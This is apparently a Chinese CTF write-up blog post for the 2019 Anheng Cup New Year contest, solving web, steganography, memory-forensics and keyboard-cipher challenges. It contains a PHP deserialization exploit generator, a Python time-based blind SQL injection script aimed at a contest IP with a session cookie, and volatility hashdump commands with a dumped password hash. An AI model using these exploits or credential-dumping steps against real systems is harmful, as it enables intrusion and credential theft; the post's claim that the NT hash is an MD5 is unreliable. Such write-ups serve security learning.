Hpdoger's Blog.

安恒杯月赛19新年场WriteUp

Word count: 589 / Reading time: 3 min
2019/01/26 Share

安恒杯月赛19新年场WriteUp

Web

WEB1

题目代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
<?php  
@error_reporting(1);
include 'flag.php';
class baby
{
protected $skyobj;
public $aaa;
public $bbb;
function __construct()
{
$this->skyobj = new sec;
}
function __toString()
{
if (isset($this->skyobj))
return $this->skyobj->read();
}
}

class cool
{
public $filename;
public $nice;
public $amzing;
function read()
{
$this->nice = unserialize($this->amzing);
$this->nice->aaa = $sth;
if($this->nice->aaa === $this->nice->bbb)
{
$file = "./{$this->filename}";
if (file_get_contents($file))
{
return file_get_contents($file);
}
else
{
return "you must be joking!";
}
}
}
}

class sec
{
function read()
{
return "it's so sec~~";
}
}

if (isset($_GET['data']))
{
$Input_data = unserialize($_GET['data']);
echo $Input_data;
}
else
{
highlight_file("./index.php");
}
?>

考点

考点一:echo可以调用toString()函数用来返回flag.php内容

考点二:让$this->nice是一个非baby的类,就能绕过$str

考点三:unserialize()不会执行construct,外部不可控protected变量skyobj,但是序列化时可以放到construct内部控制

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
class baby 
{
protected $skyobj;
function __construct()
{
$this->skyobj = new cool;
$this->skyobj->amzing = serialize(new sec);
$this->skyobj->filename = "flag.php";
}

}

class sec
{
function read(){}
}

class cool
{
public $filename;
public $nice;
public $amzing;
}


$test = new baby();
echo urlencode(serialize($test));

WEB2

约束攻击登陆admin

登陆后盲注

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin/env python
# encoding: utf-8

import requests
import time


def login(payload):
url = "http://106.12.21.77/Admin/User/Index?search[table]=flag/**/where/**/1/**/and/**/%s" % (payload)
# print "[+] %s" % (url)
before_time = time.time()
cookies = {'PHPSESSID': '3kus5jrhoqav8te0kf74hglii7'}
response = requests.get(url, cookies=cookies)
# content = response.content
after_time = time.time()
offset = after_time - before_time
# print "[*] Offset : %f" % (offset)
if offset > 2.5:
return True
else:
return False

def main():
data = ""
charaters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
for i in range(1, 40, 1):
for j in charaters:
payload = "if((mid((select/**/flag/**/from/**/flag),%d,1))='%s',sleep(3),0)%%23" % (i, j)
if login(payload):
data += str(j)
print "[+] Found : %s" % (data)
break


if __name__ == "__main__":
main()

MISC

隐写

1
binwalk -e zhu.jpg

Stegsolve

MISC2

内存取证

volatility一把梭

1
2
volatility imageinfo -f memory #分析操作系统
volatility hashdump -f memory --profile=WinXPSP2x86 #查看当前操作系统中的 password hash

得到管理员hash如下:

1
Administrator:500:0182bd0bd4444bf867cd839bf040d93b:c22b315c040ae6e0efee3518d830362b:::

所以c22b315c040ae6e0efee3518d830362b即为管理员密码的md5值,解出来是123456789,再md5一下就行。

相关链接

内存取证工具 volatility 使用说明:https://www.restran.net/2017/08/10/memory-forensics-tool-volatility/

CRYPTO

键盘密码

ypau -> flag

CATALOG
  1. 1. 安恒杯月赛19新年场WriteUp
  2. 2. Web
    1. 2.1. WEB1
      1. 2.1.1. 考点
      2. 2.1.2. EXP
    2. 2.2. WEB2
  3. 3. MISC
    1. 3.1. 隐写
    2. 3.2. MISC2
      1. 3.2.1. 内存取证
      2. 3.2.2. 相关链接
  4. 4. CRYPTO
    1. 4.1. 键盘密码